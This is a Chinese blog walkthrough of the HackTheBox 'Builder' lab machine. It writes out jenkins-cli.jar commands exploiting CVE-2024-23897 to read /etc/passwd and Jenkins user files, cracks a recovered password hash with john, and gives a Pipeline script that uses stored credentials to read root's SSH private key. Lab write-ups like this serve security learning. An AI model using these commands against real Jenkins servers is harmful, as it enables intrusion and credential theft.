HackTheBox-Machines--Builder

本文介绍了使用端口扫描工具nmap检测开放端口后,针对jenkins2.441版本的漏洞测试过程,包括CVE-2024-23897漏洞利用、hash密码破解以及通过Pipeline获取和利用SSH密钥进行权限提升的方法。
摘要由CSDN通过智能技术生成


Builder测试过程


1 端口扫描


nmap -sC -sV 10.129.230.220

在这里插入图片描述


2 测试思路


系统开启了22和8080端口,22端口无账号密码,测试方向主要从8080的jenkins服务开始测试。
在测试开源系统时,可以下载源代码或本地搭建服务,以便更清楚的了解服务的相关信息。


3 漏洞测试


  1.访问8080端口,应用程序为2.441版本 jenkins
在这里插入图片描述

  2.通过搜索引擎查找相关exploit
在这里插入图片描述

  3.CVE-2024-23897漏洞利用

CVE-2024-23897漏洞详情:https://www.cvedetails.com/cve/CVE-2024-23897/
jenkins-cli.jar工具地址:https://github.com/CKevens/CVE-2024-23897

# 读取/etc/passwd文件
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://10.129.230.220:8080' help "@/etc/passwd"

在这里插入图片描述

#查看users.txt文件
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://10.129.230.220:8080' connect-node "@/var/jenkins_home/users/users.xml"    

在users.txt文件中,发现用户名及附加的随机字符串 jennifer_12108429903186576833

在这里插入图片描述

在jennifer_12108429903186576833用户目录下,存在config.xml文件,保存了用户的密码哈希:

java -jar jenkins-cli.jar -noCertificateCheck -s 'http://10.129.230.220:8080' connect-node "@/var/jenkins_home/users/jennifer_12108429903186576833/config.xml"

在这里插入图片描述

使用john工具破解hash密码:

vim  $2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a > hash
john hash -w=rockyou.txt

在这里插入图片描述

  4.权限获取

利用账号密码 jennifer:princess登录jenkins

在这里插入图片描述

  5.权限提升

jenkins 上存储了root用户及密码,但是ssh密钥无法访问,通过创建管道并使用ssh运行命令获取密钥文件:
在这里插入图片描述

使用如下脚本利用Pipeline获取ssh密钥

pipeline {
agent any
stages {
stage('SSH') {
steps {
script {
sshagent(credentials: ['1']) { sh 'ssh -o StrictHostKeyChecking=no root@10.129.230.220 "cat /root/.ssh/id_rsa"'
}
}
}
}
}
}

在这里插入图片描述

在这里插入图片描述

利用ssh密钥登录

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值